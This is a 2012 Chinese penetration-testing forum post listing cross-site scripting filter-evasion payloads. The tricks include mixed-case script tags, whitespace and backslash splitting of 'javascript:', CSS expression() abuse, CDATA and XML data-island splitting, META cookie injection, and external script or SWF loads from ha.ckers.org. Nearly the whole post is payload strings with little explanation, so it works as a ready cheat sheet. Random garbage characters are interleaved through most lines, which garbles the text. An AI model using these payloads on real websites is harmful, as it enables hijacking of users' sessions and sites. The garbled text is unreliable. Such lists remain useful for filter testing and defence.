中国网络渗透测试联盟

标题: Cross Site Scripting(XSS)攻击手法介绍 [打印本页]

作者: admin    时间: 2012-12-31 09:59
标题: Cross Site Scripting(XSS)攻击手法介绍
1. 改变字符大小写
0 L- T1 M% E+ f6 h8 a8 O7 B. d9 F6 U( Y# A8 B( T  H' m
6 g! d6 y# h7 {0 c

- D3 d/ z% P5 k9 b, t    <sCript>alert(‘d’)</scRipT>0 `$ z/ l5 z1 r+ ]! P
: h+ j1 d+ g+ f* S
2. 利用多加一些其它字符来规避Regular Expression的检查
) ~% @% M& I& S- N; Q( M3 E7 J" I" y9 l2 q' L0 s
    <<script>alert(‘c’)//<</script>6 @6 I$ w- @* L& i- b
/ b% U# P2 |3 U' a) v
    <SCRIPT a=">" SRC="t.js"></SCRIPT>/ L: `) s- b7 M& [1 c
+ j. x, t8 _4 u" V
    <SCRIPT =">" SRC="t.js"></SCRIPT>" ?7 w5 J2 z- ^3 ~2 }. S1 O

* M! q& i5 ]1 K% T; `" T    <SCRIPT a=">" ” SRC="t.js"></SCRIPT>
5 d3 W, x7 i; r- T1 w3 {: c* b
% i# ~, e  {' U2 L    <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
/ B" n7 u( _. h" ^" h
+ q; J5 K$ |  L1 m( e+ G2 g    <SCRIPT a=`>` SRC="t.js"></SCRIPT>
& y7 X! N" `0 w% L+ _9 f# Z! }4 L
    <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
0 G, Y% [- m) f: {: d
  r! ]! w2 c  [% V- S/ B3. 以其它扩展名取代.js: X4 m4 w+ S4 `% L  ^  {: [  m  ^% V) B
9 D) s! N2 t: j- M% T5 n
    <script src="bad.jpg"></script>
; o9 s, c/ V# ^, g
+ f' ]/ j7 n9 y) c, S) V4. 将Javascript写在CSS档里. |! z" H# }$ D: V& K" z

3 Z: X% X& N  i4 D    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+ y6 }2 O: d& l; Y4 ^/ ~
' B- a9 E2 T) {8 w. _0 c       example:
0 o2 [$ w5 i4 H- R
; x* T8 I4 a8 B) h1 B          body {1 W: k5 B# a: x, {- B2 [: m* Z. p# w
: g" E. I" e% b. O& S
               background-image: url(‘javascript:alert("XSS");’)
, v+ @5 i% h! W, V3 U
6 {" h0 M& V. p5 S# X. N          }- l2 l1 L* a; h  f! e, {' Q/ N

. u  _7 ^, ?2 i# |1 z5. 在script的tag里加入一些其它字符& k( p3 F5 c6 y) x& V( n3 F" O

- ~( z8 }: I; C: W. D( c6 S% e    <SCRIPT/SRC="t.js"></SCRIPT>4 ]# K$ R/ @3 b

/ P' U6 y( w2 V  p8 Z# J    <SCRIPT/anyword SRC="t.js"></SCRIPT>5 r' K3 a$ x/ M; H0 q1 x
: t# z( \+ W$ R; f0 B& {
6. 使用tab或是new line来规避
9 C: g4 _2 j2 R+ m5 F. `7 D+ m6 ]7 |! N( |# s
    <img src="jav ascr ipt:alert(‘XSS3′)">
5 J4 t# ]+ r/ g' S% O+ e9 d3 E2 N. W
7 X1 w) j  }3 `# b9 o    <img src="jav ascr ipt:alert(‘XSS3′)">4 ~$ a. z6 K& e% E6 X/ g5 v$ E

; e! u% C/ }+ V% Z- G    <IMG SRC="jav ascript:alert(‘XSS’);">7 N; }9 l5 Y, w3 s

" W# \0 Y1 p, T         -> tag* e. V( S& K" X5 l; V

3 `% D" \! i  f! U- \         -> new line, \$ A; k8 @1 d

0 J7 K7 a  |/ F7. 使用"\"来规避2 j( O4 g7 Z& k- }8 N
7 R6 e8 @8 a) Z  \
    <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
- |7 t& }0 J: C* ~' h; x, \" ]; h$ Z2 T: b9 d7 Y
    <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>0 o# F# j6 h; o- S+ _
, \; O1 Z( f. u
    <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
& s/ e1 d0 b0 o+ N9 v3 `+ ?* f! z1 `: j/ U- Z$ w
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 J$ W, @) V6 p: {* ~5 v; v, ^5 |/ V% ~/ l' m1 G: O# `4 l  \9 a- ?
    <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
, r, J5 Q0 W! Y6 V" h, U! L
# k4 z/ L- x- @5 j, X2 W3 @8. 使用Hex encode来规避(也可能会把";"拿掉): J4 z, h9 o, R! M) A1 v

/ s) g. g8 ^( M    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, M% ]  t  K  p" i8 O% V* X' Q1 d) j4 E- ~. {
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
, `% i, U& r. B( \& I
, P8 I; z7 g6 \1 q  h% B6 Y. N    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
: o: z" p9 P$ U# g, Y8 X4 b
$ ]: l) X" E: Y        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">  Y# k! z, g8 h8 D1 E" C

3 V" p! M- {) j" _9. script in HTML tag
$ ~6 x1 ?- }% n: w( _/ H. {7 d
" z- f! C& ~% d( o    <body onload=」alert(‘onload’)」>: I9 b! [8 i- {$ C0 g8 E
0 ?" J$ \9 b, \( i1 f
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
3 M. [6 e  r% V! q) B- Z0 }/ G- t0 D
. |, M: m+ L% j6 x10. 在swf里含有xss的code9 O9 w* d7 u! v3 t

5 f8 ^9 W6 j8 L. n$ N$ n/ B9 x    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>% C+ _  v/ O1 Y; X3 f( u. b
4 j1 N3 f, W2 A
11. 利用CDATA将xss的code拆开,再组合起来。" w. q! x* ?/ k6 V& v) j
( k2 Q1 k0 s! x9 L
    <XML ID=I><X><C>: Z3 R3 j6 a7 G) i' w5 N: ?( @

; M+ ]7 ]/ B0 N- x7 ]    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
" K) ~& Z' t9 ]4 }! i- A* K- b" E' H
    </C></X>& o" [& ^4 B9 @% I+ v5 F  H
$ N( ~3 z# x7 x: ]
    </xml>% f6 ]% N8 Q% A* C  u
+ q- {% Q2 m2 e$ m! k# E* p$ Q4 K: J
    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>1 Y2 V: i4 V  ^! S+ n& h9 h$ P
' I& E, G0 B. H. ~; A
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
$ Z# A- \  w0 ^1 t; g
5 |4 N# p" M, T' f; W# a8 ?    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>  H3 n# c  P" o8 H! M( h4 g7 v

/ A' b- b: e0 e! I12. 利用HTML+TIME。) z% A( Z, q8 p5 n& U, L

) g! `9 x' t3 L; Z4 e    <HTML><BODY>
$ r1 M% x0 v8 ^( k3 O/ }$ l+ [( k: ]0 L& B
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
; W" _' H0 v! K" ]
9 i& L) K5 P% S8 F. y+ V- V    <?import namespace="t" implementation="#default#time2">
. K$ D0 ?6 ?& X6 q9 P( P& @! z& S% s2 x' Q# ?* ]8 X
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">. s4 x9 C( Z" x1 F

. J, @7 X! Z" r/ i    </BODY></HTML>* L9 @3 ~9 P  w' ]# B; T  u1 \3 P
) f" I+ I* r- }2 W  r
13. 透过META写入Cookie。
" J7 }! r) H5 ]- ]& E
: a; b8 X0 U' W4 Z( f5 q0 C    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
7 N! B( H- J: f2 _7 L. w, s$ H
" Z. ?4 X! v0 |$ F+ T( O14. javascript in src , href , url& R, x3 l; M9 V- r2 F) F5 E" {

8 u6 l$ o$ S$ ?$ l0 z; E$ C    <IFRAME SRC=javascript:alert(’13′)></IFRAME>+ U- d2 N$ l4 Z  U; n( m9 ~- e
& k5 N! U: `$ @  R+ m0 N, ^# H. Q
    <img src="javascript:alert(‘XSS3′)">
8 y- c( x% F$ L4 F/ O; O* O) Y; I% A$ |8 N1 s) f, i
<IMG DYNSRC="javascript:alert(‘XSS20′)">
, r+ n4 m' Y: X# m; D, h
( ~5 b0 ?( J3 S4 O: Z- v  w2 f    <IMG LOWSRC="javascript:alert(‘XSS21′)">5 E1 c* B3 R+ }, z" m3 S5 o
& B: C$ V% J/ R# Y6 ]" |8 Y
    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">" e% x/ L5 I- i6 K
9 E7 z7 U* t0 \3 A0 A
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>- \$ P1 Z3 a% ]6 P6 l5 ]" ]. N
9 o- t1 u9 x( C' j/ {/ R" F/ k
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">2 M; K( I% b- Z6 {) i2 A
+ w% e  m8 n" B3 r: T2 a
    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">9 m- t: e8 R9 S# V( ?
6 F# t9 ]- w7 a6 Y
    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
2 a0 G1 Y$ ~& s6 x8 a
# n, m" G: e2 f! [( M  w2 L    </STYLE><A CLASS=XSS></A>: S. R5 y' ^5 ]5 B! P9 j

! X  W* G$ r4 i3 d9 s    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
5 n9 a1 Z# g. k+ ~+ J! |" K& v
, z! ]- v& c& b5 h, f




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2